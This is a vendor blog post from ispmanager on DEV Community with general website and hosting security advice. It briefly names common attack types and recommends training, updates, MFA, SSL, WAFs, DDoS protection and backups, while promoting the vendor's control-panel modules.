DEV Community

Cover image for How to protect your website and hosting from cyberattacks — recommendations and turn-key solutions for project security
ispmanager.com for Ispmanager

Posted on

How to protect your website and hosting from cyberattacks — recommendations and turn-key solutions for project security

n 2016, Cambridge Analytica illegally collected data from 87 million Facebook users through an application that exploited a vulnerability in Facebook's system. This data was used for political advertising and to manipulate voters' opinions during the US presidential election, causing widespread public outcry and accruing billions of dollars in fines.

According to Check Point Research, the number of cyberattacks in the second quarter of 2024 has increased by 30% compared to last year. In this article, we will describe the ways fraudsters most often try to hack companies and how to avoid it.

Here’s a checklist of the most important things for website and hosting security in case you don't have time to read the whole thing.

Checklist: the key points for site and hosting security

Never neglect information security, even if you have just a small site. Large organizations have strengthened their protection methods so it's getting harder to hack them. Therefore, even a small company can become a target for cybercriminals.

Train your team on the basics of information security - in 2023, a study by Webinarcare found that 95% of cyberattacks globally are due to human error. Your employees have to know how to properly respond to phishing, what kind of passwords to set and how to store them, and how to properly send and receive information. Train them by describing and showing examples, test them not just as a formality, and make anyone who fails retake the course.

Update your software regularly — if you don't update your software, you run a higher risk of getting hacked by the latest scam tactics. Ideally, use solutions that are regularly updated and supported by their vendors.

Use password managers and multi-factor authentication to protect account access. For example, password managers like KeePass or Bitwarden and authentication applications like Google Authenticator or Check Point.

Install an SSL certificate to avoid getting penalized for data leakage. For a small project a free Let's Encrypt one is enough, for medium and large projects, it is better to choose paid ones with additional protection.

Choose turn-key solutions to protect your server from the main types of attacks — for example, security modules or all-in-one solutions. Learn more about site and server protection options in the ispmanager blog →

What is attacked most often and how — from cracking passwords to code vulnerabilities

Hackers are constantly looking for new targets. for example, the level of protection in the financial sector has become so high that criminals are turning their attention to other sectors - even a very small organization can be a target of a cyberattack.

Hackers most often attack:

  • Servers — trying to access or "drop" the server and its accounts.
  • Vulnerabilities in code and applications — looking for weaknesses through which to gain access to data and software.
  • Data that is transferred between a user and a server — users leave personal information, card numbers, and other data that fraudsters can exploit.

Next, let's go over each target and attack variant in detail.

Server access — fraudsters try to gain unauthorized access to the site’s server or control panel. The goal is to "drop" the server, hack into its accounts, and gain control of the server and site.

According to Webinarcare, 95% of cyberattacks worldwide are caused by the human factor - for example, employees clicking unsafe links from fraudsters or giving passwords to third parties.

The methods fraudsters use to gain access to servers include:

  • Bruteforce attacks — attackers simply access passwords to accounts by trying different combinations. If the password is weak, they can access the site quickly.
  • Weak access rights attacks — poorly configured access rights allow attackers to perform actions to which they should not have access
  • DDoS attacks — the site receives many requests and "goes down" due to overload.
  • Malware and viruses — viruses on the server can slow it down, delete files or block access to important features.
  • Phishing — users are sent phishing links to fake password pages and the attackers steal their credentials.

Code and application vulnerabilities — attackers exploit weaknesses in website software, such as the CMS or plugins to inject malicious code or gain access to data.

Ways fraudsters can find weaknesses in code and applications:

  • SQL injection — attackers inject malicious commands into a form on a website and gain access to the database.
  • Cross-site scripting (XSS) — malicious scripts are injected into site code and activated in users' browsers.
  • Looking for vulnerabilities in the CMS and plugins — older or insecure versions of programs may contain bugs that can be easily exploited.

Threats related to data transfer — concerns the interception of data between users and the server. Most often, data is stolen over unencrypted connections - if a site does not use HTTPS, data is transmitted openly and can be easily intercepted.

Possible consequences of the attacks listed above:

  • Penalties for leaking sensitive data — for example, the EU has the General Data Protection Regulation (GDPR), which stipulates fines of up to €10 million or 2% of a company's annual turnover.
  • Loss of traffic — the site may drop in the search results.
  • Hacking into the admin panel.
  • Infection of the site with viruses.

Tesla, for example, often comes under attack. In 2022, 19-year-old David Colombo discovered a vulnerability in Tesla Mate, the software used to track Tesla vehicles. The vulnerability allowed him to remotely access 25 Tesla electric vehicles in 13 countries. David could open doors and windows and start the engine without a key. The young man later contacted the Tesla security team and Tesla Mate developers to report the vulnerability.

8 ways to protect your website and hosting to prevent a cyberattack

It is important to regularly improve your company's information security system without waiting for a cyberattack to occur. Even if you have a small website or business, we recommend the following methods of defense:

Train your team in the rules of information security — in the previous section, we noted that, in most cases, cyberattacks occur due to human error. Therefore, it is important to train employees on how to properly handle sensitive data and basic information security rules. For example, do not click on links from unknown sources and do not download files from dubious links.

Conduct training and test your employees not just as a formality but to really test their knowledge of the rules. Even better, show real-life examples of the tricks fraudsters use and what the consequences can be.

A company's infrastructure can gat hacked starting with its personal accounts. For example, fraudsters can send phishing links over social networks under the guise of offering a subscription to a service. If an employee clicks on the link, the fraudster will gain access to the corporate system.

Install an SSL certificate — SSL certificates encrypt the data that is transmitted between the user and the server and makes it impossible to intercept. The certificate encrypts passwords and credit card numbers and other personal information that users enter on websites.

SSL certificates can be obtained through a hosting provider or special certification centers. Many hosting companies and control panels offer free SSL certificates like those from Let's Encrypt.
We recommend using a free Let's Encrypt certificate for small projects, and for commercial sites paid SSL certificates that include insurance in case of data breach. Which SSL certificate to choose and whether you can do without one →

Regularly update your CMS and plugins — outdated software often contains vulnerabilities that can be exploited by attackers. Modern CMSs like WordPress, Joomla, and others - regularly release updates that help protect your site from vulnerabilities.

In the ispmanager control panel, you can set up automatic updates for your CMS and plugins. This is especially important for sites that run on popular CMSs such as WordPress which are often the targets of cyberattacks.

Protect your passwords. Simple passwords are easy to attack with a brute force, so it's important to use complex passwords and additional protection. Writing down passwords on a piece of paper and storing them under your keyboard is not the best idea =)

Use password managers such as KeePass or Bitwarden. Password managers can help you generate complex ones and store them securely.

For example, in 2020, Zoom faced the problem of so-called "Zoom-bombing" — infiltration of video conferences by unwanted persons. After a series of incidents, the company made comprehensive changes to improve its security including end-to-end encryption and enhanced conference security settings.

Enable multi-factor authentication — MFA. It is a security method that requires you to prove your identity in two or more ways to authenticate. For example, using a password, a code from an application, and answering a secret question. For multi-factor authentication, you can use Google Authenticator or Check Point.

Enable MFA for all site administrators. Use MFA in systems where maximum data protection is needed and the cost of data leakage would be high.

Control access rights — assign access rights ensuring that each user can use only those services and data that are necessary for his/her work. In this case, even if an employee is compromised, the attacker will only have access to a limited part of the information infrastructure and the damage will be minimal.

In most CMSs, you can assign roles to users, for example, editor, administrator, and author. You can also restrict access by IP or geographic location.

Conduct a user audit and assign each employee only the rights they need. Regularly check and remove access from employees who are no longer working with the project.

Install DDoS protection — DDoS protection solutions filter malicious traffic, offload the server and allow only authorized users to access the site. DDoS protection can be configured using off-the-shelf solutions like the DDoS-Guard protection module →

In 2023, for example, Kaspersky Lab prevented one of the largest DDoS attacks on the Russian financial sector. The company used its own solutions and was able to repel the attack, which targeted bank servers, ensuring uninterrupted operation of online services and the security of customer data.

Configure WAF, which protects against SQL injection and XSS, cross-site scripts that can lead to data leakage or site infection. WAF analyzes all incoming traffic, filters suspicious requests, and blocks them. Many WAFs are available in off-the-shelf solutions like BitNinja or ModSecurity. How will BitNinja protect your site and server? Find out in the ispmanager blog →

Make regular backups of your site and databases — backups help you recover from attacks, crashes, or random errors, and will help get your system back up and running. Use built-in hosting solutions or external services to automate backups. For example, you can set up automatic backups on a schedule in the ispmanager control panel. How to backup your site in ispmanager →

Turn-key solutions to protect your website and hosting from cyberattacks

There are dozens of turn-key solutions on the market. Let's briefly go over the most popular ones, their functionality, and cost.

Image description

This article was originally published on the ispmanager blog

Top comments (0)